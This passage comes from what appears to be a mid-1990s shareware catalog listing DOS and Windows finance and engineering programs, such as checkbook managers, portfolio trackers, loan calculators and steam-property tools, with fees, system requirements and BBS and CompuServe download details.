floppy disk + drive; CGA monitor. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support. 3-month + return policy. 6-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: MLRCHK32.ZIP on BBSs; MLRCHK.ZIP on CompuServe in + CIS:ASPCD forum LIBrary 0. + Download size: 365k (about 27 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Lets you keep your checkbook the way you always have. No + accounting and bookkeeping learning curve to conquer. Just + enter your records and it does the tedious parts, like keeping + the running balance, balancing the register, and totaling your + tax deductions at the end of the year. Data entry is easy + thanks to Quickeys. + + + Product: DJ-CHECK + Print checks on DeskJet printers. See full description on + page 103. + + Product: EXPRESSCHECK + Author: Expressware Corporation, 206-788-0932 + Version: 4.04 (11-18-93) + Needs: IBM PC, DOS 2.0 or better. 320k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $34.95 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $23.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 2-month return policy; discounts on + upgrades. 1-month free upgrading allowed. + Look for: CHECK4.ZIP on BBSs (call 206-788-4008 to download it at + no charge); CHECK4.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 4 (or contact userID 75226,2020 for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Easy-to-use checkbook manager. Screens resemble actual checks, + deposit slips and automated teller machine panels. Split + transactions up to 5 ways with over 200 budget codes per + account. Up to 90 accounts. Reports can be printed to show + + Chapter 8, "Finances" 399 + + + + totals, monthly totals, average monthly budget code totals and + more. Combined accounts for more detailed reports. Print + checks on any check format. Bill reminder system, + reconciliation, activity log. + + + Product: Money Organizer + Manages unlimited number of accounts, budget. See full + description on page 395. + + Product: QPACS + Author: Richard A. Williams, 815-455-6333 + Version: 3.3 (02-01-95) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $20.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; all ASP-wide offers + (see page 6); discounts on upgrades. + Look for: availability unknown on BBSs; QPAC33.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 5 (or contact userID 72317,2073 for + assistance). + PsL#: 10133 + Download size: 85k (about seven minutes with a 2400 baud modem) + Description: + Designed to provide financial management functions for + individuals and families. The following functions are + provided: checkbook entries for up to nine bank accounts; + check printing with a recurring check file; check registers; + budget entry and actual-to-budget reports; ability to record + and track assets, liabilities, and investments; net worth + calculation and printout; index card file and a household + inventory file. + + Chapter 8, "Finances" 400 + + + + 8.3 Portfolio management + + Product: Capital Gainz + Author: AlleyCat Software, Inc., 919-542-6117 + Version: 4.0 (06-01-95) + Needs: IBM PC, DOS 5.0 or better. 2048k RAM; Hard disk; XMS + memory. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; 2-month return policy; bonus utilities; discounts + on upgrades. + Look for: CGZ*.ZIP on BBSs (multiple files) (call 919-542-6611 to + download it at no charge); CGZ*.ZIP on CompuServe in CIS:INVFOR + forum LIBrary 9 (multiple files) (or contact userID 70431,132 + for assistance). + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Awards & nominations: 1993 finalist, Shareware Industry Awards. + Description: + Portfolio manager for small investors and investment managers. + Ideal for 'dollar-cost averaging' strategy. Record purchases, + sales, dividends, capital gains, splits. Calculate gain/loss, + IRR, & total return. View or print security information over + range of dates. Reinvest dividends, redistribute sale + proceeds. Execute sales using FIFO, LIFO, max gain/loss, ID, + average cost. Variety of reports including tax forms. Single + price entry updates all related securities. Bond discount/ + amortization. + + + Product: DDE Requester for Win3.x & NT + DDE history recorder to access1.1 MDB or text. See full + description on page 406. + + Product: THE FEELING'S MUTUAL-WINDOWS + Mutual fund database/financial planner. See full description + on page 390. + + Product: Loan Master + Complete loan accounting and tracking system. See full + description on page 315. + + Product: PCLoan5 + Professional loan amortization system. See full description on + page 309. + + Product: Personal Finances 2 + Full function personal/small business finance. See full + description on page 393. + + Chapter 8, "Finances" 401 + + + + Product: Portfolio Manager + Author: Shane Software International, 206-681-2402 + Version: 4.5 (12-25-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. + Registration fee: $49.00 (add $3.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, BBS, CompuServe, mail support; + 1-month return policy; bonus utilities; all ASP-wide offers + (see page 6). + Look for: PORTMGR*.ZIP on BBSs (multiple files) (call + 206-452-7681 to download it at no charge); PM45-*.ZIP on + CompuServe in CIS:INVEST forum LIBrary 10 (multiple files) (or + contact userID 73060,2370 for assistance). + Download size: 850k (about 63 minutes with a 2400 baud modem) + Description: + Tracks most market investments. It also can handle CD's, + savings, limited partnerships, etc. Can maintain up to 5 accts + in 1 portfolio to separate your records for an IRA, spousal + IRA, special purpose account, etc. Will measure portfolio + performance to meet long range goals. It computes ROI, + estimated and actual yields, and other analytical data. It's an + excellent tax preparation and planning tool. 17 reports. Share + selection on sales. Menu driven & mouse compatible. + + + Product: Savings + Author: My Little Realm Enterprises, 201-529-8318 + Version: 3.0 (06-20-93) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support. 3-month + return policy. 6-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: MLRSAV30.ZIP on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + This financial recorder lets you keep track of what you have + and where you've stored the necessary documents. When it comes + time to apply for a home loan, for example, Savings proves + invaluable. Simply print your portfolio and have it in hand + when you see the bank's loan representative. That way you'll + have the information the loan rep will want to see, like how + much you have in mutual funds, savings bonds, certificates of + deposit, etc. + + Chapter 8, "Finances" 402 + + + + Product: Stock Wiz + Stock price analyser, multi-dimensional. See full description + on page 387. + + Product: Total Investor for 1-2-3 Window [***] + Portfolio management and charting for 1-2-3. See full + description on page 272. + + Product: Variable Investment Analyst + Author: Will Baldwin, 913-381-9109 + Version: 5.92 (04-01-95) + Needs: IBM PC, DOS 2.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Mouse; math coprocessor. + Registration fee: $15.00 + Registration benefits: 31/2" master disk(s); 12 months of phone, + fax, CompuServe, mail support; bonus data; all ASP-wide offers + (see page 6); disks of other shareware. Lifetime free + upgrading allowed. + Look for: VARIN592.ZIP on BBSs; VARINV.ZIP on CompuServe in + CIS:INVFORUM forum LIBrary 5 (or contact userID 76200,275 for + assistance). + SWREG#: 2579 + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + Calculates profit, capital gain, periodic, cumulative, and + average annual total return, internal rate of return (IRR), + buy/sell prices, and other statistics. Produces 12 types of + charts. Can import/export data. It is especially useful for + investments involving multiple cash flows, such as mutual + funds, 401k plans, annuities, and partnerships, but also is + helpful for stocks, bonds, bank accounts, CD's, etc. Has pull + down menus, dialog boxes, and mouse support. + + + Product: Wall Street Simulator - Windows + Learn how to trade and compete with others. See full + description on page 388. + + + 8.4 Financial calculators + + See also: Utilities, Desktop utilities, Calculators; + Spreadsheet applications; Business, Business utilities, Weights + & measurements. + + Chapter 8, "Finances" 403 + + + + Product: Amortz - Loan Schedules & More! + Author: Mountain View Software, 206-845-2744 + Version: 1.60 (10-31-94) + Needs: IBM PC, DOS 2.11 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $10.00 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, GEnie, mail support; + 1-month return policy; all ASP-wide offers (see page 6). + 12-month free upgrading allowed. + Look for: AMORTZ16.ZIP on BBSs (call 415-323-4398 to download it + at no charge); AMORTZ.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 5 (or contact userID 74040,533 for assistance); + AMORTZ16.ZIP on GEnie in IBMPC forum LIBrary 30. + SWREG#: 3711 + PsL#: 11660 + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + A very "user friendly" financial loan system designed to be + useful an understandable to everyone - from a CPA putting + together a multi-million dollar deal to a teenager trying to + swing that first car loan. It can calculate any of the loan + variables (principal, interest rate, payment amount, or number + of payments), immediately show loan totals, and then generate a + "payback" schedule which you can review on screen or send to + the printer for a "hardcopy" record of payments. + + + Product: Financial Analysis For Windows + Analyze large variety of financial instrument. See full + description on page 390. + + Product: Math Wiz + Author: Informatik Inc., 610.640.0339 + Version: 2.0 (06-15-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + + Chapter 8, "Finances" 404 + + + + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; MATHWZ.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 11 (or contact userID 76534,1166 + for assistance). + SWREG#: 6322 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Versatile, easy-to-use financial calculator. PV, FV, IRR, + periods, payback functions, spreadsheet-type input of irregular + cash flow, save and print functions, view and print multi-term + amortization tables, calendar date calculations, paper tape, + roll-back, cut & paste, trigonometry. Excellent all-purpose + calculator. + + + Product: OpenHome + Selling property qualification generator. See full description + on page 363. + + Product: PCLoan5 + Professional loan amortization system. See full description on + page 309. + + Product: Personal Finances 2 + Full function personal/small business finance. See full + description on page 393. + + Product: WinPrice + Picks best deal from any two choices. See full description on + page 408. + + + 8.5 Income tax preparation + + Product: Vehicle Costs + Reports on costs involved with vehicle use. See full + description on page 340. + + + 8.6 Finance utilities + + Product: Amortz - Loan Schedules & More! + Easy loan calculation system. See full description on + page 402. + + Product: Cash Control + A personal finance and business checkbook. See full + description on page 397. + + Product: Charging + The only credit card manager. See full description on + page 394. + + Chapter 8, "Finances" 405 + + + + Product: DDE Requester for Win3.x & NT + Author: Westerdale AG, 41-62-260935 + Version: 1.01.00 (03-31-94) + Needs: IBM 80386, Windows 3.0 or better. VGA monitor; Hard disk; + Mouse; VBRUN300.DLL. + Strongly recommended: SVGA monitor; EMS memory; math + coprocessor. + Registration fee: Sfr75.00 (add Sfr12.00 for shipping to U.S. + addresses) (add Sfr12.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 6 months of unlimited phone, fax, + CompuServe, mail support; site license; all ASP-wide offers + (see page 6); discounts on other products; discounts on + upgrades. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; DDEREQ.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 11 (or contact userID 100144,2552 + for assistance). + Download size: 1105k (about 82 minutes with a 2400 baud modem) + Description: + This program will record changes in DDE data through DDE links + e.g. price history can be recorded from Reuters 1000, or profit + & loss can be recorded from Excel and saved in Access v1.1 MDB + or delimeted textfile format. Many DDE links allowed. Unlimited + DDE sources. Can record multiple data items per DDE record + (bid, ask, etc). Records data in Access v1.1 MDB or delimeted + textfile format. Windows NT tested. Fully configurable and has + a totally automatic mode. Can even detect bad DDE data or + prices. + + + Product: Financial Analysis For Windows + Analyze large variety of financial instrument. See full + description on page 390. + + Product: FINANCIAL WIZARD(tm) + Author: SilvaSoft Software, Inc., 615-247-7551 + Version: 5.35 (05-29-93) + Needs: IBM PC, DOS 2.1 or better. 256k RAM. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support. 1 free update disk(s) sent out. + Look for: FINWIZ5.ZIP on BBSs (call 815-886-3233 to download it + at no charge); FW5.ZIP on CompuServe in CIS:IBMSW forum LIBrary + 6 (or contact userID 71736,316 for assistance). + Download size: 138k (about ten minutes with a 2400 baud modem) + Description: + A very prowerful, easy to use investment and loan analysis + program that calculates dozens of personal and business + financial situations with ease. Amortization tables, savings + and investment growth, tax-free vs non-tax free yields, T-bill + analysis, Stock dividend calculations, multiple depreciations, + + Chapter 8, "Finances" 406 + + + + date calculations, multiple present and future values, IRA + calculations and retirement planning are just a few of the + options that are built in. + + + Product: Portfolio Manager + Powerful record system for your investments. See full + description on page 400. + + Product: WinPrice + Author: Open Windows, 719-531-0403 + Version: 1.0 (02-10-94) + Needs: IBM AT (80286), Windows 3.1 or better. 512k RAM; VGA + monitor; Hard disk. + Strongly recommended: Mouse. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of CompuServe, mail support; lifetime return policy; + bonus utilities; disks of other shareware. 12-month free + upgrading allowed. + Look for: PRICE_10.ZIP on BBSs (call 703-680-9269 to download it + at no charge); PRICE.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 10 (or contact userID 75236,3243 for assistance). + Download size: 56k (about four minutes with a 2400 baud modem) + Description: + Selects the best pricing between two alternatives. No more + struggling with the "Is 1 liter of GummySlurp for $1.29 a + better buy than 1 gallon for $4.87 ?" issue!! Automatically + accounts for differences in the units used in the two cases and + will give its results in either metric or English units as + desired. Easy to use - educational for children. + + Chapter 9, "Engineering" 407 + + + + + + Chapter 9 + Engineering + + See also: Data, Engineering data; Graphics, CAD/CAM + applications. + + + 9.1 Civil engineering + + Product: Beam Cookbook + 2D beam solver - linear elastic systems. See full description + on page 411. + + + 9.2 Electrical engineering + + Product: ETCAI Electronics Instruction + Electronics learning and training system. See full description + on page 520. + + Product: INSTINDX + Author: C T Johnson, Inc, 704-568-9598 + Version: 1.0 (09-01-94) + Needs: IBM AT (80286), DOS 3.2 or better. 1000k RAM; CGA + monitor; Hercules monitor; Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Epson printer. + Strongly recommended: EMS memory; math coprocessor. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 12 months of + phone, fax, BBS, CompuServe, mail support; 2-month return + policy; site license; bonus data; all ASP-wide offers (see + page 6); disks of other shareware. 12-month free upgrading + allowed. + Look for: CTJIII.* on BBSs (multiple files) (call 704-532-1236 to + download it at no charge); CTJIII.* on CompuServe in CIS:LEAP + forum LIBrary 4 (multiple files) (or contact userID 72760,1020 + for assistance). + SWREG#: 3479 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Relational instrument index that prints (4) index reports: I/O, + address, specs, and full index. Prints instrument, control & + safety valve, and gauge/thermometer data sheets + (specifications). Includes ESTIMATing, CONTROLS, PROCPARM, and + MEASVAR dbs. Linked by pop-up windows to ISA standards for + developing Tags. Limited only by HD size. Menu driven, help at + all screens. Can be customized for complete project management. + + Chapter 9, "Engineering" 408 + + + + Product: PC-ECAP + Author: Circuit Systems, 609-875-5433 + Version: 3.01 (01-24-94) + Needs: IBM PC, DOS 2.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: CGA monitor; Hercules monitor; HP DeskJet + printer; HP LaserJet printer; Epson printer. + Registration fee: $99.00 (add $4.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities; all ASP-wide offers (see page 6). + 2-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: ECAP301.ZIP on BBSs (call 609-764-0812 to download it + at no charge); ECAP30.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 13 (or contact userID 72202,3043 for assistance). + PsL#: 10411 + Download size: 174k (about 13 minutes with a 2400 baud modem) + Description: + This easy-to-use linear circuit analysis program will calculate + gain, phase, group delay, impedance, VSWR, and return loss for + your circuits. Also calculates transient response for one of 8 + input waveforms. Completely menu driven. Can analyze circuits + with up to 90 nodes and 1000 components. Built in full screen + text editor with "Help". Full screen file selector. Plots high + res graphs on screen or on IBM/Epson-9/24 pin, HP LaserJet or + HP DeskJet printers. Even makes bipolar transistor models. + + + Product: Power + Author: Byte O'Software + Version: 1.00 (10-11-92) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $49.00 + Registration benefits: Printed manual, three months of support, + one free upgrade, upgrade discounts. + Look for: PWR100.ZIP on BBSs (multiple files) (call 301-862-1527 + to download it at no charge); PWR100.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 13 (multiple files). + Download size: 800k (about 60 minutes with a 2400 baud modem) + Description: + Designed for (but not limited to) a group of Electronics + Engineers involved in IC circuit design tasks. It calculates + from one or two input files the required current for a set of + IC chips in a circuit design, and provides a means of + information sharing among engineers via a merge operation. + Power maintains a DataBase of IC chip electrical parameters, + allowing users optimum speed of data entry. Features include + optimum ease of data entry, editing, and merging. + + Chapter 9, "Engineering" 409 + + + + Product: RADIOSIM + Author: BREMENSON + Version: 3.0 (04-01-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; CGA monitor; + Hercules monitor. + Strongly recommended: EGA monitor; Hard disk; math coprocessor. + Registration fee: $1,800.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited fax, CompuServe, mail + support; 6-month return policy; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + 12-month free upgrading allowed. 12 free update disk(s) sent + out. + Look for: RADSIM30.ZIP on BBSs. + Download size: 370k (about 28 minutes with a 2400 baud modem) + Description: + Simulates a digital/analog radioelectric link in presence of + distorsions and interferences. Technical domains: satellite + transmission, radiolinks, mobile radio, etc. 44 modules + (digital modem, filter, equalizer, TWT, etc.), with variable + parameters. On line contextual Help (120 screens). Typical + resolved problem: BER versus C/N as a function of power amp. + backoff and type/level of interferers Digital modulations: PSK, + OQPSK, QAM, FSK, MSK, etc. + + + 9.3 Industrial engineering + + Product: DXF Bill of Materials Generator + Bills of materials from AutoCAD DXF files. See full + description on page 418. + + + 9.4 Mechanical engineering + + Product: Beam Cookbook + Author: SoftEngineering, 714-497-3952 + Version: 1.00 (10-01-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; CGA monitor; + Hercules monitor; Hard disk; HP DeskJet printer; HP LaserJet + printer; Epson printer. + Strongly recommended: EGA monitor; Mouse; EMS memory; math + coprocessor. + Registration fee: $59.95 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, CompuServe, mail support; 3-month return policy; all + + Chapter 9, "Engineering" 410 + + + + ASP-wide offers (see page 6); discounts on upgrades. Prodigy + support. + Look for: BCKBK10.ZIP on BBSs; BCKBK.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 13 (or contact userID 72760,76 for + assistance). + SWREG#: 4363 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Solves 2D beams with multiple supports, variable I, hinges, + moment connectors, concentrated loads, moments, uniform loads, + and ramp loads. Springs can be added to the supports, hinges, + and moment connectors. Forced deflection and slopes can be + defined at the supports. You can display or print input data, + reactions, boundary conditions, and beam values. You can also + graphically display or print the beam and shear/moment/slope/ + diagrams. (520K min RAM) + + + Product: J-Works + HVAC load calculation and sizing program. See full description + on page 355. + + Product: Steam Properties + Version: 1.0 (06-28-95) + Needs: IBM AT (80286), Windows 3.0 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive; Mouse. + Registration fee: $60.00 + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of unlimited CompuServe, mail support; all + ASP-wide offers (see page 6); discounts on upgrades. 1 free + update disk(s) sent out. + Look for: STEAM10*.ZIP on BBSs (multiple files); STEAM.ZIP on + CompuServe in CIS:PCAPP forum LIBrary 13 (or contact userID + 100131,2557 for assistance). + SWREG#: 6376 + PsL#: 14093 + Download size: 530k (about 40 minutes with a 2400 baud modem) + Description: + A Windows application that calculates the properties of steam/ + water within a wide range of pressure and temprature. It may be + used for analyzing a number of energy conversion components + used in power plants, such as steam turbines, pumps, boilers + and heat exchangers. The accompanied help file "Thermodynamics + online help" gives a brief description of these components. + + Chapter 9, "Engineering" 411 + + + + Product: Water and Steam Properties + Author: Katmar Software + Version: 1.2 (08-12-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: Hard disk. + Registration fee: $40.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited CompuServe, mail support; 3-month return + policy; all ASP-wide offers (see page 6). + Look for: WASP12.ZIP on BBSs; WASP.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 13 (or contact userID 100100,2050 for + assistance). + SWREG#: 3263 + PsL#: 11376 + Download size: 131k (about ten minutes with a 2400 baud modem) + Description: + Replaces and improves on printed steam tables by providing a + wider set of properties, eliminating need to interpolate, and + working in many different units. Will find the conditions for + known values of enthalpy, entropy or density. Has context + sensitive on-line help. + + It gives 15 point properties and 17 temperature and pressure + dependent properties for ice, water and steam. Most + correlations cover from -100 to 800 deg C and up to 1000 bar. + Calculated data points match published data very closely. + + + 9.5 Structural analysis + + Product: Beam Cookbook + 2D beam solver - linear elastic systems. See full description + on page 409. + + + 9.6 Surveying & cartography + + See also: Data, Mapping data; Graphics, Business applications, + Mapping/cartography. + + Product: Landscape Explorer + 3D landscape visualization tool. See full description on + page 573. + + Product: MAPIT + Detailed world mapping with GPS data import. See full + description on page 573. + + Chapter 9, "Engineering" 412 + + + + 9.7 Engineering utilities + + Product: AstroFormulaCalculator 3 + Spreadsheet calculator science engin finance. See full + description on page 270. + + Product: Beam Cookbook + 2D beam solver - linear elastic systems. See full description + on page 409. + + Product: CALC_JNC + The ultimate TSR programmers calculator. See full description + on page 147. + + Product: Convert It!(tm) SE + Versatile unit of measure converter. See full description on + page 382. + + Product: Grafer Line Graphs for Reports + Author: Lovell's, 803-224-2474 + Version: 2.1 (04-15-95) + Needs: IBM AT (80286), Windows 3.1 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; 3-month return + policy; bonus data; all ASP-wide offers (see page 6); discounts + on other products; discounts on upgrades. 3-month free + upgrading allowed. + Look for: GRAFER21.ZIP on BBSs; GRAFER.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 13 (or contact userID 70404,3470 for + assistance). + Download size: 105k (about eight minutes with a 2400 baud modem) + Description: + Makes ANSI look-alike graphs suitable for scientific and + engineering reports. Line graphs and scatter plots are built + from X-Y data entered from the keyboard, a text file, or the + Clipboard. The "Picture" graphs can be copied to the Clipboard + and pasted into other applications as an adjustable graph. + Saved graphs are in text file format. Printed graphs are + adjustable in size. Learn to graph with the samples included. + + Chapter 9, "Engineering" 413 + + + + Product: I&M USA + Author: C T Johnson, Inc, 704-568-9598 + Version: 1.05 (05-05-94) + Needs: IBM AT (80286), DOS 3.2 or better. 1000k RAM; CGA + monitor; Hercules monitor; Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Epson printer. + Strongly recommended: Hayes-compatible modem; EMS memory. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 12 months of + unlimited phone, fax, BBS, CompuServe, mail support; 2-month + return policy; LAN license; site license; bonus data; all ASP- + wide offers (see page 6); disks of other shareware. 12-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: CTJII&.* on BBSs (multiple files) (call 704-532-1236 to + download it at no charge); CTJII&.* on CompuServe in CIS:LEAP + forum LIBrary 4 (multiple files) (or contact userID 72760,1020 + for assistance). + SWREG#: 3478 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Process controls directory of manufacturers cross referenced to + Instrument devices, representatives and distributors. Allows + you to look up a device and lists all manufacturers, then you + select a Mfr and it shows you the rep or distributor. You + enter the records and link them through pop-up windows and it + is all menu driven. You can build a relational database for + any products or catagories, however, this version includes + catagories for instruments, most US Engr Assn and Instrument + Tech journals. + + + Product: INSTINDX + Instr index, prints lists and data sheets. See full + description on page 407. + + Chapter 9, "Engineering" 414 + + + + Product: INSTSPEC + Author: C T Johnson, Inc, 704-568-9598 + Version: 1.0 (05-05-93) + Needs: IBM AT (80286), DOS 3.2 or better. Program can run safely + on a system with no hard disk and only one floppy disk drive; + CGA monitor; Hercules monitor; HP DeskJet printer; HP LaserJet + printer; Epson printer. Lotus v2.x, Allways or WYSIWYG. + Strongly recommended: Dual 720k floppy drives; Postscript + printer. + Registration fee: $20.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; 51/4" master disk(s); 12 + months of unlimited fax, BBS, CompuServe, mail support; 2-month + return policy; site license; all ASP-wide offers (see page 6); + disks of other shareware. 12-month free upgrading allowed. + Look for: INSTSPEC.EXE on BBSs (call 704-532-1236 to download it + at no charge); INSPEC.EXE on CompuServe in CIS:LEAP forum + LIBrary 4 (or contact userID 72760,1020 for assistance). + SWREG#: 3480 + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + Produce professional looking process controls instrument data + sheets for purchasing and engineering design. Based on ISA + outdated manual entry forms, but, updated for modern controls. + Uses DTP fonts to give professional appearence, not just ASCII + text. Made for HP Laser, but, works with dot matrix if you + presently have Lotus Allways or WYSIWYG. 35 Templates in all + from annunciators through control valves. + + + Product: Judy's TenKey + Powerful, flexible Windows calculator. See full description on + page 148. + + Product: METRIC-X + Metric-English-Metric conversion utility. See full description + on page 381. + + Product: Power + Calculates total IC circuit current. See full description on + page 408. + + Product: SmartDraw [***] + Drag & drop flowcharting & draw for Windows. See full + description on page 571. + + Product: Steam Properties + Helpful for analyzing power plants. See full description on + page 410. + + Product: TURBO TPU TOOLKIT! + Pascal math function toolkit. See full description on + page 499. + + Chapter 9, "Engineering" 415 + + + + 9.7.1 File format translators + + Product: REALIZE + Full converter from .DXF to POV raytracer. See full + description on page 569. + + + 9.8 Software tools & add-ins + + 9.8.1 For multiple programs + + Product: Playground + Tool for building object models. See full description on + page 453. + + 9.8.2 For other + + Product: Mathplot + Mathematical function plotting program. See full description + on page 450. + + Product: Nominal Pipe Size for Windows + Author: Herne Data Systems Ltd, 519-366-2732 + Version: 2.1 (03-28-94) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $29.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, GEnie, mail support. 3-month + free upgrading allowed. + Look for: availability unknown on BBSs; PIPEW2.EXE on CompuServe + in CIS:IBMAPP forum LIBrary 13 (or contact userID 72060,1153 + for assistance). + Download size: 68k (about five minutes with a 2400 baud modem) + Description: + Displays dimensional, weight and flow capacity data for a wide + range of piping materials and sizes (over 3000 sizes of + standard and specialty pipes in over 25 materials). A must for + all piping engineers and students. + + + Product: Nonlin + Linear and nonlinear statistical regression. See full + description on page 447. + + Chapter 9, "Engineering" 416 + + + + Product: NPS - Nominal Pipe Size + Author: Herne Data Systems Ltd, 519-366-2732 + Version: 2.1 (10-01-92) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $29.95 + Registration benefits: 3 months of support. 2-month free + upgrading allowed. + Look for: availability unknown on BBSs; PIPE2.ZIP on CompuServe + in CIS:IBMAPP forum LIBrary 13 (or contact userID 72060,1153 + for assistance). + Download size: 97k (about seven minutes with a 2400 baud modem) + Description: + Displays dimensional, weight and flow capacity data for a wide + range of piping materials and sizes. (Over 2000 sizes of + standard and specialty pipes in over 25 different materials). + Easy to use menu driven format with user selectable dimensional + units (US, Imperial or metric) and display colors. A must for + all piping engineers and students. + + + 9.9 Other + + Product: DXF Bill of Materials Generator + Author: Annabec Business Services, 216-674-5444 + Version: DOS1.00 (03-01-95) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: VGA monitor; Hard disk; HP 